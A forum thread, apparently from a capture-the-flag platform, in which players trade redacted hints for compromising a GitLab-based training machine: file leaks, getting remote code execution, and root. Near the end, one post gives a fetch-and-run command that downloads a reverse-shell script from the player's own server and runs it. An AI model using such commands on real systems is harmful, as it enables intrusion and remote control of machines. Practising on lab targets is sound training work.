Official Laboratory Discussion

Felt like I was on the verge of getting RCE but got so stuck I tried resetting the machine as a last resort, and now only 502 errors like others have mentioned. Is there a trick to getting around those?

Switched VPNs and I’m back in business. Although it doesn’t fix it for anyone on that original VPN.

I can get some file exfiltration, but not much more. Do I need to set up a local G***** instance and poke around it to see what files to take or is that a time waste? Cheers.

EDIT: afaik I can only grab files that the g*****-w** user has perms to view (or one of the g*****-xxxxx users)

Type your comment> @andrenl said:

Got a foothold and landed on a limited Dr C*****.
Any nudges on how to get user?

Hint:
Google basic commands research on G****-r**** C******.
You should think what to do with D *****
if you need something PM

Spoiler Removed

Hi Guys, There must be another trick than using R**** C******.

Type your comment> @mohsinhakak said:

Whoops, GitLab is taking too much time to respond. been like this for days, any information on how to get rid of this please PM , thanks

Same here, it worked great for me before

Hnmm I leaked the secret, but I can’t get r*** to run my payload. I tried adding spaces to remove ='s as 0xc45 suggested but still no luck. Any tips?

Stuck on the foothold. I’ve found the g** URL and made an account. Can create a project and get it to call a r****r on my local g***** instance, but haven’t found a way to turn this into anything yet. Searched for CVEs but haven’t found any that are useful. As usual I may have missed something obvious?

Rooted :wink:

That was an easy box?
I don’t think so…
Thanks, @n3ph0s for the nudge on foothold.

Feel free to PM if any help is needed.

guys im stuck in the beginning can someone dm me a hint to start with, i did a service scan and i can’t get anywhere around the website

Rooted!

why am i so distracted and overlook things???
Contrary to everyone, the user was easier than the root !

Might be luck but, things just went the right path (even not using docker prior to this)…

foot:

  • look carefully (enumeration)
  • Some things (do… cof… mains) are just a pot full of honey…
  • find the version and build piece by piece with that (find that POC)
  • When exploiting, if the payload fails, check what was said about the “=” symbols (i did not had that issue tho)
  • remember what was, also, said, the machine might not have the bins you want/need

user:

  • It was already mentioned (if you cant crack/find, just hammer the guts and reset the machine!)

root:

  • Enum (latest) might help you over Peas on this one
  • when the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it

If nudges needed, honk the horn on pm

Thought I’d have a nice little time on this box, but it seems to be 502’ing everything for me after stops/starts/resets :frowning:

Edit: I had to change servers for it to work.

Actually got a shell but no idea about how to find the user flag.

Please send me some nudges.

I’ve reached the gi**ab page, registered an account, discovered the L_I, but can’t undestand how to get R_E, i’ve read about ss*f but it says import url is blocked, am i on the right path? i’m blocked …

Spoiler Removed

This box made me sweat, there are still some mysteries that I have not solved, why some payload works for one person is not the other …

I spent a lot of time setting up the env

it is not an easy box for me

if you need help PM

Yikes, this is not an easy box for me.

I thought I had some plain ruby working for generating the payload, but it’s just not accepted. The ‘other’ more convoluted doc*** route has also failed to generate a payload which works.

Hint for those struggling with a foothold: If you get a “Something went wrong” error, try a different bin

What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems

this approach got me good: wget “yourserver/rev.sh” && chmod +x rev.sh && ./rev.sh

trying the bash rev shell directly did not worked for me and the one i said above was reliable all the times (used it like 6 times due to resets and stuff)